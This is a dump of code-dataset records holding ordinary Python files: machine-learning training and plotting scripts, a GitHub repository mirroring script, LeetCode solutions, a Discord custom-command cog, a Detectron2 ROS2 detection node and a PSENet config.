model.add(MaxPooling2D(pool_size=(2, 2)))\r\n# model.add(Conv2D(128, kernel_size=(3, 3), activation='relu', kernel_regularizer=regularizers.l2(0.0001)))\r\n# # model.add(BatchNormalization())\r\n# model.add(MaxPooling2D(pool_size=(2, 2)))\r\n# model.add(Conv2D(7, kernel_size=(1, 1), activation='relu', kernel_regularizer=regularizers.l2(0.0001)))\r\n# # # model.add(BatchNormalization())\r\n# model.add(Conv2D(7, kernel_size=(4, 4), activation='relu', kernel_regularizer=regularizers.l2(0.0001)))\r\n# # model.add(BatchNormalization())\r\n\r\n# model.add(Flatten())\r\n# model.add(Activation(\"softmax\"))\r\n# model.summary()\r\n\r\n# model = Sequential()\r\n\r\n# model.add(Conv2D(num_features, kernel_size=(3, 3), activation='relu', input_shape=(width, height, 1), data_format='channels_last', kernel_regularizer=l2(0.01)))\r\n# model.add(Conv2D(num_features, kernel_size=(3, 3), activation='relu', padding='same'))\r\n# model.add(BatchNormalization())\r\n# model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\r\n# model.add(Dropout(0.5))\r\n\r\n# model.add(Conv2D(2*num_features, kernel_size=(3, 3), activation='relu', 
padding='same'))\r\n# model.add(BatchNormalization())\r\n# model.add(Conv2D(2*num_features, kernel_size=(3, 3), activation='relu', padding='same'))\r\n# model.add(BatchNormalization())\r\n# model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\r\n# model.add(Dropout(0.5))\r\n\r\n# model.add(Conv2D(2*2*num_features, kernel_size=(3, 3), activation='relu', padding='same'))\r\n# model.add(BatchNormalization())\r\n# model.add(Conv2D(2*2*num_features, kernel_size=(3, 3), activation='relu', padding='same'))\r\n# model.add(BatchNormalization())\r\n# model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\r\n# model.add(Dropout(0.5))\r\n\r\n# model.add(Conv2D(2*2*2*num_features, kernel_size=(3, 3), activation='relu', padding='same'))\r\n# model.add(BatchNormalization())\r\n# model.add(Conv2D(2*2*2*num_features, kernel_size=(3, 3), activation='relu', padding='same'))\r\n# model.add(BatchNormalization())\r\n# model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\r\n# model.add(Dropout(0.5))\r\n\r\n# model.add(Flatten())\r\n\r\n# model.add(Dense(2*2*2*num_features, activation='relu'))\r\n# model.add(Dropout(0.4))\r\n# model.add(Dense(2*2*num_features, activation='relu'))\r\n# model.add(Dropout(0.4))\r\n# model.add(Dense(2*num_features, activation='relu'))\r\n# model.add(Dropout(0.5))\r\n\r\n# model.add(Dense(num_labels, activation='softmax'))\r\n\r\n# # Mostra o sumario da rede\r\n# model.summary()\r\nmodel.compile(loss=categorical_crossentropy,\r\n #optimizer=Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-7),\r\n optimizer=Adam(lr=0.0001, decay=1e-6),\r\n metrics=['accuracy'])\r\n\r\n#tensorboard = TensorBoard(log_dir='./logs')\r\nlr_reducer = ReduceLROnPlateau(monitor='val_loss', factor=0.9, patience=3, verbose=1)\r\nearly_stopper = EarlyStopping(monitor='val_loss', min_delta=0, patience=8, verbose=1, mode='auto')\r\ncheckpointer = ModelCheckpoint(MODELPATH, monitor='val_loss', verbose=1, save_best_only=True)\r\n\r\nmodel.fit(np.array(X_train), np.array(y_train),\r\n batch_size=batch_size,\r\n epochs=epochs,\r\n verbose=1,\r\n validation_data=(np.array(X_test), np.array(y_test)),\r\n shuffle=True,\r\n callbacks=[lr_reducer, early_stopper, checkpointer])\r\n #callbacks=[lr_reducer, tensorboard, early_stopper, checkpointer])\r\n\r\nscores = model.evaluate(np.array(X_test), np.array(y_test), batch_size=batch_size)\r\nprint(\"Loss: \" + str(scores[0]))\r\nprint(\"Accuracy: \" + str(scores[1]))","sub_path":"emotion_training.py","file_name":"emotion_training.py","file_ext":"py","file_size_in_byte":8174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"175796839","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nf = open('op4.txt')\nA = f.readlines()\nf.close()\n\nA = [l.strip('\\n') for l in A]\n\nloss = []\ntr_a = []\nval_a = []\n\nQ = []\nR = []\nfor i in range(len(A)):\n\tif 'epoch' in A[i]:\n\t\tQ.append(A[i])\n\telse:\n\t\tR.append(A[i])\n\nfor i in range(len(R)):\n\t#print R[i]\n\t_,sep,Vals = R[i].rpartition('loss ')\n\tvals,_,tr_val = Vals.partition(' ')\n\ttr,_,val = tr_val.rpartition(' ')\n\t#print vals\n\tloss.append(float(vals))\n\t#tr_a.append(float(tr))\n\t#val_a.append(float(val))\n\ntr_a = []\nval_a = []\nfor i in range(len(Q)):\n\t_,sep,t_a = Q[i].rpartition('training: ')\n\tt_a,_,_ = t_a.partition(' ')\n\t_,sep,v_a = Q[i].rpartition('validation: ')\n\ttr_a.append(float(t_a))\n\tval_a.append(float(v_a))\n\n\nsns.set_style(\"darkgrid\")\n#sns.distplot(loss, color='g')\nplt.plot(loss, 
color='g', label='loss')\n#plt.plot(tr_a, color='r', label='training accuracy')\n#plt.plot(val_a, color='b', label='validation accuracy')\nplt.legend(loc='upper right')\nplt.xlabel('iteration')\nplt.ylabel('loss')\nplt.title('loss vs iteration')\nplt.show()\n\nsns.set_style(\"darkgrid\")\nplt.plot(tr_a, color='r', label='training accuracy')\nplt.plot(val_a, color='b', label='validation accuracy')\nplt.legend(loc='upper right')\nplt.xlabel('iteration')\nplt.ylabel('accuracy')\nplt.title('accuracy vs iteration')\nplt.show()","sub_path":"vis_loss.py","file_name":"vis_loss.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"529668891","text":"import tensorflow as tf\nimport numpy as np\nimport time\nimport matplotlib.pylab as plt\n\ntf_dtype = tf.float16\nnp_dtype = np.float16\ntotal_data_size = 1000\ntraining_data_size = 500\ntraining_iterations = 1000\nlr = 0.1\n\nfor initial_data in range(1):\n np.random.seed(1)\n data_size = int(total_data_size / 2)\n data_set_0_x1 = (np.random.randn(data_size).astype(np_dtype) + 5).reshape(-1, 1)\n data_set_0_x2 = (np.random.randn(data_size).astype(np_dtype) + 5).reshape(-1, 1)\n data_set_0_x = np.hstack((data_set_0_x1, data_set_0_x2))\n data_set_0_y = (np.zeros(data_size).astype(np_dtype)).reshape(-1, 1)\n data_set_1_x1 = (np.random.randn(data_size).astype(np_dtype) + 2).reshape(-1, 1)\n data_set_1_x2 = (np.random.randn(data_size).astype(np_dtype) + 2).reshape(-1, 1)\n data_set_1_x = np.hstack((data_set_1_x1, data_set_1_x2))\n data_set_1_y = (np.ones(data_size).astype(np_dtype)).reshape(-1, 1)\n data_set_x = np.vstack((data_set_0_x, data_set_1_x))\n data_set_y = np.vstack((data_set_0_y, data_set_1_y))\n data_set = np.hstack((data_set_x, data_set_y))\n np.random.shuffle(data_set)\n plt.ion()\n subplot1 = plt.subplot(121)\n plt.scatter(data_set[data_set[:, 2] == 0, 0], data_set[data_set[:, 2] == 0, 1], c='g')\n plt.scatter(data_set[data_set[:, 2] == 1, 0], data_set[data_set[:, 2] == 1, 1], c='r')\n # plt.show()\n\nwith tf.name_scope('data_set'):\n train_x, train_y = data_set[:training_data_size, :2], data_set[:training_data_size, 2].reshape(-1, 1)\n test_x, test_y = data_set[training_data_size:, :2], data_set[training_data_size:, 2].reshape(-1, 1)\n\nx = tf.placeholder(dtype=tf_dtype, shape=[training_data_size, 2], name='x')\ny = tf.placeholder(dtype=tf_dtype, shape=[training_data_size, 1], name='y')\n\nwith tf.name_scope('model'):\n weight_1 = tf.Variable(0.1 * tf.truncated_normal(shape=[2, 1], dtype=tf_dtype, name='randomize'), name='weight_1')\n bias_1 = tf.Variable(0.1 * tf.truncated_normal(shape=[1], dtype=tf_dtype, name='randomize'), name='bias_1')\n prediction = tf.nn.sigmoid(tf.add(tf.matmul(x, weight_1), bias_1), name='sigmoid_model')\n\nwith tf.name_scope('cost'):\n cost = tf.reduce_mean(tf.pow(prediction - y, 2), name='cost')\n\nwith tf.name_scope('train'):\n optimizer = tf.train.AdamOptimizer(learning_rate=lr, epsilon=1e-3).minimize(cost)\n\ntf.summary.scalar('cost', cost)\nsummary_op = tf.summary.merge_all()\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n writer = tf.summary.FileWriter('./sigmoid_regression', graph=sess.graph)\n for iteration in range(training_iterations):\n _, s = sess.run([optimizer, summary_op], feed_dict={x: train_x, y: train_y})\n writer.add_summary(s, iteration)\n if iteration % 20 == 0:\n c, p_tr = sess.run([cost, prediction], feed_dict={x: train_x, y: train_y})\n p_te = sess.run(prediction, 
feed_dict={x: test_x, y: test_y})\n            print(\n                'iteration:', iteration,\n                'cost:', c,\n                'training accuracy:', np.sum((p_tr[:, 0] >= 0.5) == (train_y[:, 0] == 1)) / training_data_size,\n                'testing accuracy:', np.sum((p_te[:, 0] >= 0.5) == (test_y[:, 0] == 1)) / (total_data_size - training_data_size),\n            )\n            subplot2 = plt.subplot(122)\n            plt.scatter(test_x[p_te[:, 0] < 0.5, 0], test_x[p_te[:, 0] < 0.5, 1], c='g')\n            plt.scatter(test_x[p_te[:, 0] >= 0.5, 0], test_x[p_te[:, 0] >= 0.5, 1], c='r')\n            plt.pause(0.2)\n            if iteration != training_iterations - 20:\n                subplot2.cla()\nplt.ioff()\nplt.show()\nsess.close()\nwriter.close()\n","sub_path":"2-basic-models/sigmoid-regression.py","file_name":"sigmoid-regression.py","file_ext":"py","file_size_in_byte":3635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"423153802","text":"#!/usr/bin/python\nimport os\nfrom github import Github\nfrom sh import git, pushd\n\nmirror_base_url = open(\"mirror_url\", \"r\").read()[:-1]\norigin_token = open(\"origin_token\", \"r\").read()[:-1]\norigin_ssh_key = os.path.dirname(os.path.realpath(__file__)) + \"/origin_key\"\n\ntry:\n    os.mkdir(\"./repos\", mode=0o700)\nexcept FileExistsError:\n    pass\n\n# origin should be a GitHub repository\nfor repo in Github(origin_token).get_user().get_repos():\n    d = f\"./repos/{repo.name}\"\n    try:\n        os.mkdir(d, mode=0o700)\n    except FileExistsError:\n        continue\n    with pushd(d):\n        git.init(\"--bare\")\n        # add origin remote\n        git.remote.add(\"origin\", repo.ssh_url)\n        # set ref\n        git.config(\"remote.origin.fetch\", \"+refs/heads/*:refs/heads/*\")\n        git.config(\"remote.origin.fetch\", \"+refs/tags/*:refs/tags/*\", \"--add\")\n        git.config(\"remote.origin.mirror\", \"true\")\n        git.fetch(\"origin\", _env={\"GIT_SSH_COMMAND\": f\"ssh -i {origin_ssh_key}\"})\n        # add remote url\n        git.remote.add(\"mirror\", mirror_base_url+repo.name+\".git\", \"--mirror\")\n        print(f\"repo added {repo.name}\")\n","sub_path":"init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"9200260","text":"\"\"\"\nDP idea:\nFind the maximum difference between two numbers in the given array (the\nhighest peak after the lowest valley).\nMax profit over the first i days = max{max profit over the first i-1 days,\nprice on day i - minimum price over the first i-1 days}\n\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n    def maxProfit(self, prices: List[int]) -> int:\n        le = len(prices)\n        if le == 0:\n            return 0\n        # state: two variables, one holding the best profit so far and one\n        # holding the minimum price seen so far\n        min_p, max_p = prices[0], 0\n\n        for i in range(le):\n            # transition:\n            # compare the current price with the running minimum and update it\n            if prices[i] < min_p:\n                min_p = prices[i]\n            elif prices[i] - min_p > max_p:\n                # compare the current profit with the best profit and update it\n                max_p = prices[i] - min_p\n\n        return max_p\n\n
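# Worked example: prices = [7, 1, 5, 3, 6, 4] -> the running minimum before\n# the best sale is 1 and the best sale price is 6, so the method returns 5.\n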
","sub_path":"Dynamic programming/121. Best Time to Buy and Sell Stock.py","file_name":"121. Best Time to Buy and Sell Stock.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"418692427","text":"from talon import Context, actions\n\nctx = Context()\n\n\n@ctx.action_class(\"core\")\nclass Actions:\n    def run_talon_script(ctx, script, m):\n        with ctx:\n            print(ctx)\n            print(script)\n            print(m)\n            script.run(actions, namespace=m)\n","sub_path":"debug/emit_context_handler.py","file_name":"emit_context_handler.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"652158095","text":"import logging\r\nimport asyncio\r\nfrom datetime import datetime\r\nfrom discord.ext import commands\r\nfrom utils.database import Database\r\nfrom asyncpg import exceptions\r\nfrom utils import checks\r\n\r\nlog = logging.getLogger(__name__)\r\nloop = asyncio.get_event_loop()\r\n\r\nclass CustomCommand(Database):\r\n    def __init__(self, tweety):\r\n        self.bot = tweety\r\n        self.cc_map = {}\r\n        super().__init__(self.bot.pool)\r\n        loop.create_task(self.populate_commands())\r\n\r\n    @commands.group(hidden=True)\r\n    async def cc(self, ctx):\r\n        pass\r\n
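\r\n    # Usage sketch (assuming the bot's configured command prefix, shown here as \"!\"):\r\n    #   !cc add greet \"Hello there!\"  -> on_message replies \"Hello there!\" whenever a member sends \"greet\"\r\n    #   !cc edit greet \"Hi!\"          -> updates the reply text\r\n    #   !cc delete greet              -> removes the trigger\r\n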
\r\n    @checks.is_admin()\r\n    @cc.command(aliases=['create'])\r\n    async def add(self, ctx, trigger_word: str, trigger_text: str):\r\n        params = [\r\n            ctx.message.author.id,\r\n            trigger_word.lower(),\r\n            trigger_text,\r\n            datetime.now(),\r\n            ctx.message.guild.id,\r\n        ]\r\n\r\n        try:\r\n            await self.execute('INSERT INTO custom_command (member_id, trigger_word, trigger_text, timestamp, server_id) '\r\n                               'VALUES ($1, $2, $3, $4, $5)', params)\r\n        except exceptions.UniqueViolationError:\r\n            await ctx.send('```[ERROR] {}```'.format('A custom command with that name already exists.'))\r\n        except Exception as err:\r\n            log.error(err)\r\n        else:\r\n            if ctx.guild.id in self.cc_map.keys():\r\n                self.cc_map[ctx.guild.id][trigger_word.lower()] = trigger_text\r\n            else:\r\n                self.cc_map[ctx.guild.id] = {trigger_word.lower(): trigger_text}\r\n            await ctx.send('```[INFO] {}```'.format('Custom command successfully created.'))\r\n\r\n    @checks.is_admin()\r\n    @cc.command(aliases=['change', 'update'])\r\n    async def edit(self, ctx, trigger_word: str, trigger_text: str):\r\n        try:\r\n            ret = await self.execute('UPDATE custom_command '\r\n                                     'SET trigger_text = $1 '\r\n                                     'WHERE trigger_word = $2 AND server_id = $3', [trigger_text,\r\n                                                                                    trigger_word,\r\n                                                                                    ctx.guild.id])\r\n        except Exception as err:\r\n            log.error(err)\r\n        else:\r\n            if int(ret[-1:]):\r\n                self.cc_map[ctx.guild.id][trigger_word] = trigger_text\r\n                await ctx.send('```[INFO] Custom command \"{}\" updated successfully.```'.format(trigger_word))\r\n            else:\r\n                await ctx.send('```[ERROR] Could not update custom command \"{}\". '\r\n                               'Are you sure it exists on this guild?```'.format(trigger_word))\r\n\r\n    @checks.is_admin()\r\n    @cc.command(aliases=['remove', 'purge'])\r\n    async def delete(self, ctx, trigger_word: str):\r\n        try:\r\n            ret = await self.execute('DELETE FROM custom_command '\r\n                                     'WHERE server_id = $1 '\r\n                                     'AND trigger_word = $2', [ctx.guild.id, trigger_word])\r\n        except Exception as err:\r\n            log.error(err)\r\n        else:\r\n            if int(ret[-1:]):\r\n                del self.cc_map[ctx.guild.id][trigger_word]\r\n                await ctx.send('```[INFO] Custom command \"{}\" removed from database successfully.```'.format(trigger_word))\r\n            else:\r\n                await ctx.send('```[ERROR] Could not delete custom command \"{}\". Are you sure it exists?```'.format(trigger_word))\r\n\r\n    @cc.command(name='list')\r\n    async def _list(self, ctx): # Use internal cc_map instead.\r\n        try:\r\n            res = await self.query('SELECT trigger_word '\r\n                                   'FROM custom_command '\r\n                                   'WHERE server_id = $1', [ctx.guild.id])\r\n        except Exception as err:\r\n            log.error(err)\r\n        else:\r\n            if len(res) > 0:\r\n                await ctx.send('**Custom Commands**\\n```{}```'.format(', '.join([x['trigger_word'] for x in res])))\r\n            else:\r\n                await ctx.send('```[INFO] Could not find any custom commands for this guild.```')\r\n\r\n\r\n    async def populate_commands(self):\r\n        try:\r\n            commands = await self.query('SELECT trigger_word, trigger_text, server_id '\r\n                                        'FROM custom_command', [])\r\n        except Exception as err:\r\n            log.error(err)\r\n        else:\r\n            for cmd in commands:\r\n                if cmd['server_id'] in self.cc_map:\r\n                    self.cc_map[cmd['server_id']].update({\r\n                        cmd['trigger_word']: cmd['trigger_text']\r\n                    })\r\n                else:\r\n                    self.cc_map[cmd['server_id']] = {\r\n                        cmd['trigger_word']: cmd['trigger_text']\r\n                    }\r\n\r\n    async def on_message(self, message):\r\n        if message.author.bot:\r\n            return\r\n        try:\r\n            reply = self.cc_map[message.guild.id][message.content.lower()]\r\n        except KeyError:\r\n            pass\r\n        except Exception as err:\r\n            log.error(err)\r\n            pass\r\n        else:\r\n            await message.channel.send(reply)\r\n\r\n\r\ndef setup(bot):\r\n    bot.add_cog(CustomCommand(bot))\r\n","sub_path":"cogs/customcommand.py","file_name":"customcommand.py","file_ext":"py","file_size_in_byte":5299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"166179607","text":"import pymongo\nfrom bson.json_util import dumps\nimport requests\nimport json\nimport dns\nimport os\n\nurl = os.environ.get(\"mongoURL\")+\"/sd-db?retryWrites=true&w=majority\"\nclient = pymongo.MongoClient(url)\n\ndb = client.get_default_database()\nusers = db['users']\n\nurlBase = 'https://api.github.com'\n\n\n# Return all the users from the database; accessed via GET /users\ndef read():\n    return dumps(users.find({},{\"_id\":0}))\n\n\ndef insert(name):\n    # the user name must not be empty\n    if name.strip() != \"\":\n        # the user must not already exist in the database\n        if users.find({\"name\": name}).count() == 0:\n\n            r = requests.get(urlBase + \"/users/\" + name)\n            # the name must belong to a real GitHub user\n            if r.status_code == 200:\n                response = json.loads(r.content)\n                numRepos = response[\"public_repos\"]\n                result = users.insert_one({\"name\": name, \"numRepos\": numRepos})\n                data = {\"id\": result.inserted_id, \"numRepos\": numRepos}\n                return dumps(data)\n            else:\n                return 'Bad request', 400, {\n                    'exists-gh-error':\n                    'The name of the user given is not in the GitHub database'\n                }\n        else:\n            return 'Bad request', 400, {\n                'exists-error': 'The user already exists in the database'\n            }\n    else:\n        return 'Bad request', 400, {\n            'empty-error': 'The name of the user given cannot be empty'\n        }\n\n\ndef delete(name):\n    # the user name must not be empty\n    if name.strip() != \"\":\n\n        # the user must exist in the database\n        if users.find({\"name\": name}).count() == 1:\n\n            users.remove({\"name\": name})\n            return 200\n        else:\n            return 'Bad request', 400, {\n                'exists-error': 'The user does not exist in the database'\n            }\n    else:\n        return 'Bad request', 400, {\n            'empty-error': 'The name of the user given cannot be empty'\n        }\n","sub_path":"src/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"534648218","text":"import detectron2\nfrom 
detectron2.utils.logger import setup_logger\nsetup_logger()\n\n# import some common libraries\nimport numpy as np \nfrom scipy.stats import multivariate_normal\n\n# import some common detectron2 utilities\nfrom detectron2 import model_zoo\nfrom detectron2.engine import DefaultPredictor\nfrom detectron2.config import get_cfg\nfrom detectron2.utils.visualizer import Visualizer\nfrom detectron2.data import MetadataCatalog, DatasetCatalog\n\nimport rclpy\nfrom rclpy.node import Node\n\nfrom sensor_msgs.msg import Image, PointCloud2\nfrom nav2_dynamic_msgs.msg import Obstacle, ObstacleArray\nfrom geometry_msgs.msg import Pose, Point\nfrom detectron2_detector.utils import NMS_3D\n\nclass Detectron2Detector(Node):\n    '''use Detectron2 to detect object masks from a 2D image and estimate 3D positions with PointCloud2 data\n    '''\n    def __init__(self):\n        super().__init__('detectron_node')\n        self.declare_parameters(\n            namespace='',\n            parameters=[\n                ('detectron_config_file', \"COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_3x.yaml\"),\n                ('detectron_score_thresh', 0.8),\n                ('pointcloud2_topic', \"/camera/depth/points\"),\n                ('pc_downsample_factor', 16),\n                ('min_mask', 20),\n                ('categories', [0]),\n                ('nms_filter', 0.3),\n                ('outlier_thresh', 0.5)\n            ])\n        self.pc_downsample_factor = int(self.get_parameter(\"pc_downsample_factor\")._value)\n        self.min_mask = self.get_parameter(\"min_mask\")._value\n        self.categories = self.get_parameter(\"categories\")._value\n        self.nms_filter = self.get_parameter(\"nms_filter\")._value\n        self.outlier_thresh = self.get_parameter(\"outlier_thresh\")._value\n\n        # setup detectron model\n        self.cfg = get_cfg()\n        config_file = self.get_parameter(\"detectron_config_file\")._value\n        self.cfg.merge_from_file(model_zoo.get_config_file(config_file))\n        self.cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = self.get_parameter(\"detectron_score_thresh\")._value\n        self.cfg.MODEL.WEIGHTS = model_zoo.get_checkpoint_url(config_file)\n        self.predictor = DefaultPredictor(self.cfg)\n\n        # subscribe to sensor \n        self.subscription = self.create_subscription(\n            PointCloud2,\n            self.get_parameter(\"pointcloud2_topic\")._value,\n            self.callback,\n            1)\n\n        # setup publishers\n        self.detect_obj_pub = self.create_publisher(ObstacleArray, 'detection', 2)\n        self.detect_img_pub = self.create_publisher(Image, 'image', 2)\n\n        self.count = -1\n\n    def outlier_filter(self, x, y, z, idx):\n        '''simple outlier filter: assume a Gaussian distribution and drop points with low probability (too far away from the center)'''\n        mean = [np.mean(x), np.mean(y), np.mean(z)]\n        cov = np.diag([np.var(x), np.var(y), np.var(z)])\n        rv = multivariate_normal(mean, cov)\n        points = np.dstack((x, y, z))\n        p = rv.pdf(points)\n        return idx[p > self.outlier_thresh]\n\n    def callback(self, msg):\n        # check if there are any subscribers\n        if self.detect_obj_pub.get_subscription_count() == 0 and self.detect_img_pub.get_subscription_count() == 0:\n            return\n\n        # extract data from msg\n        height = msg.height\n        width = msg.width\n        points = np.array(msg.data, dtype = 'uint8')\n\n        # decode rgb image\n        rgb_offset = msg.fields[3].offset\n        point_step = msg.point_step\n        r = points[rgb_offset::point_step]\n        g = points[(rgb_offset+1)::point_step]\n        b = points[(rgb_offset+2)::point_step]\n        img = np.concatenate([r[:, None], g[:, None], b[:, None]], axis = -1)\n        self.img = img.reshape((height, width, 3))\n\n        # decode point cloud data\n        if msg.fields[0].datatype < 3:\n            byte = 1\n        elif msg.fields[0].datatype < 5:\n            byte = 2\n        elif msg.fields[0].datatype < 8:\n            byte = 4\n        else:\n            byte = 8\n        points = points.view('<f' + str(byte))\n
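        # Stride arithmetic for the slicing below (example values): with\n        # point_step = 32 bytes and float32 fields (byte = 4) there are 8\n        # floats per point, so a downsample factor of 16 gives a stride of\n        # 16 * 32 / 4 = 128 floats, i.e. every 16th point is kept.\n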
        x = points[0::int(self.pc_downsample_factor * point_step / byte)]\n        y = points[1::int(self.pc_downsample_factor * point_step / byte)]\n        z = points[2::int(self.pc_downsample_factor * point_step / byte)]\n\n        self.points = [x, y, z]\n        self.header = msg.header\n\n        # call detect function\n        self.detect()\n\n    def process_points(self, outputs):\n        '''estimate 3D position and size with detectron output and pointcloud data'''\n        x, y, z = self.points\n\n        # map mask to point cloud data\n        num_classes = outputs['instances'].pred_classes.shape[0]\n        if num_classes == 0:\n            self.detect_obj_pub.publish(ObstacleArray())\n            return\n\n        masks = outputs[\"instances\"].pred_masks.cpu().numpy().astype('uint8').reshape((num_classes, -1))[:, ::self.pc_downsample_factor]\n        scores = outputs[\"instances\"].scores.cpu().numpy().astype(float)\n\n        # estimate 3D position with simple averaging of obstacle's points\n        detections = []\n        for i in range(num_classes):\n            # if the user does not specify any category of interest, keep everything; otherwise keep only the requested categories\n            if (len(self.categories) == 0) or (outputs[\"instances\"].pred_classes[i] in self.categories):\n                idx = np.where(masks[i])[0]\n                idx = self.outlier_filter(x[idx], y[idx], z[idx], idx)\n                if idx.shape[0] < self.min_mask:\n                    continue\n                obstacle_msg = Obstacle()\n                # pointcloud2 data has a different coordinate, swap y and z\n                # using (max+min)/2 instead of the mean avoids bias from unbalanced point density\n                x_max = x[idx].max()\n                x_min = x[idx].min()\n                y_max = y[idx].max()\n                y_min = y[idx].min()\n                z_max = z[idx].max()\n                z_min = z[idx].min()\n                obstacle_msg.score = scores[i]\n                obstacle_msg.position.x = float((x_max + x_min) / 2)\n                obstacle_msg.position.y = float((y_max + y_min) / 2)\n                obstacle_msg.position.z = float((z_max + z_min) / 2)\n                obstacle_msg.size.x = float(x_max - x_min)\n                obstacle_msg.size.y = float(y_max - y_min)\n                obstacle_msg.size.z = float(z_max - z_min)\n                detections.append(obstacle_msg)\n\n        return detections\n\n    def detect(self):\n        # call detectron2 model\n        outputs = self.predictor(self.img)\n\n        # process pointcloud to get 3D position and size\n        detections = self.process_points(outputs)\n\n        # publish detection result \n        obstacle_array = ObstacleArray()\n        obstacle_array.header = self.header\n        if self.detect_obj_pub.get_subscription_count() > 0:\n            obstacle_array.obstacles = detections\n            self.detect_obj_pub.publish(obstacle_array)\n\n        # visualize detection with detectron API\n        if self.detect_img_pub.get_subscription_count() > 0:\n            v = Visualizer(self.img[:, :, ::-1], MetadataCatalog.get(self.cfg.DATASETS.TRAIN[0]), scale=1)\n            out = v.draw_instance_predictions(outputs[\"instances\"].to(\"cpu\"))\n            out_img = out.get_image()[:, :, ::-1]\n            out_img_msg = Image()\n            out_img_msg.header = self.header\n            out_img_msg.height = out_img.shape[0]\n            out_img_msg.width = out_img.shape[1]\n            out_img_msg.encoding = 'rgb8'\n            out_img_msg.step = 3 * out_img.shape[1]\n            out_img_msg.data = out_img.flatten().tolist()\n            self.detect_img_pub.publish(out_img_msg)\n\ndef main():\n    rclpy.init(args = None)\n    node = Detectron2Detector()\n    node.get_logger().info(\"start spinning detectron_node...\")\n    \n    rclpy.spin(node)\n\n    rclpy.shutdown()\n\nif __name__ == '__main__':\n    main()\n","sub_path":"detectron2_detector/detectron2_detector/detectron2_node.py","file_name":"detectron2_node.py","file_ext":"py","file_size_in_byte":7967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"98283200","text":"# -*- coding: utf-8 -*-\r\n# @Time : 2019/1/3 17:40\r\n# @Author : zhoujun\r\n\r\n# data config\r\ntrainroot = 'Training Set'\r\ntestroot = 'Test Set'\r\noutput_dir = '/content/drive/My Drive/PSENet_2'\r\npretrained_path = '/content/drive/My Drive/PSENet_2/PSENet_resnet50.pth'\r\ndata_shape = 640\r\n\r\n# train config\r\ngpu_id = '0'\r\nworkers = 0\r\nstart_epoch = 0\r\nepochs = 300\r\n\r\ntrain_batch_size = 4\r\n\r\nlr = 1e-6\r\nend_lr = 1e-6\r\nlr_gamma = 0.1\r\nlr_decay_step = [100,200]\r\nweight_decay = 5e-4\r\nwarm_up_epoch = 6\r\nwarm_up_lr = lr * lr_gamma\r\n\r\ndisplay_input_images = False\r\ndisplay_output_images = False\r\ndisplay_interval = 10\r\nshow_images_interval = 50\r\n\r\npretrained = False\r\nrestart_training = False\r\ncheckpoint = ''\r\n\r\n# net config\r\nbackbone = 'resnet50'\r\nLambda = 0.7\r\nn = 6\r\nm = 0.5\r\nOHEM_ratio = 3\r\nscale = 1\r\n# random seed\r\nseed = 2\r\n\r\n\r\ndef print():\r\n from pprint import pformat\r\n tem_d = {}\r\n for k, v in globals().items():\r\n if not k.startswith('_') and not callable(v):\r\n tem_d[k] = v\r\n return pformat(tem_d)\r\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"37090824","text":"\"\"\"\nGiven a linked list, reverse the nodes of a linked list k at a time and return its modified list.\n\nk is a positive integer and is less than or equal to the length of the linked list. If the number of nodes is not a multiple of k then left-out nodes in the end should remain as it is.\n\nExample:\n\nGiven this linked list: 1->2->3->4->5\n\nFor k = 2, you should return: 2->1->4->3->5\n\nFor k = 3, you should return: 3->2->1->4->5\n\nNote:\n\nOnly constant extra memory is allowed.\nYou may not alter the values in the list's nodes, only nodes itself may be changed.\n\n\"\"\"\nfrom typing import List\n\n# Definition for singly-linked list.\n\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution:\n def reverseKGroup(self, head: ListNode, k: int) -> ListNode:\n dummy = ListNode(None)\n c = dummy\n p = head\n while 1:\n swap = []\n # populate swap for this k-elements.\n while p is not None and len(swap) != k:\n swap.append(p)\n p = p.next\n print([i.val for i in swap])\n # swap\n if len(swap) < k:\n print('len is ', len(swap))\n if len(swap) > 0:\n c.next = swap[0]\n break\n else:\n for i in range(k):\n if i == 0:\n swap[0].next = swap[-1].next\n else:\n swap[i].next = swap[i-1]\n c.next = swap[-1]\n c = swap[0]\n # advance\n p = c.next\n if p is None:\n print('p is none')\n break\n return dummy.next\n\n\na = Solution()\nhead = ListNode(1)\nl2 = ListNode(2)\nl3 = ListNode(3)\nl4 = ListNode(4)\nl5 = ListNode(5)\nhead.next = l2\nl2.next = l3\nl3.next = l4\nl4.next = l5\nout = a.reverseKGroup(head, 6)\nwhile out is not None:\n print(out.val)\n out = out.next\n","sub_path":"leetcode1-115/25. Reverse Nodes in k-Group.py","file_name":"25. 
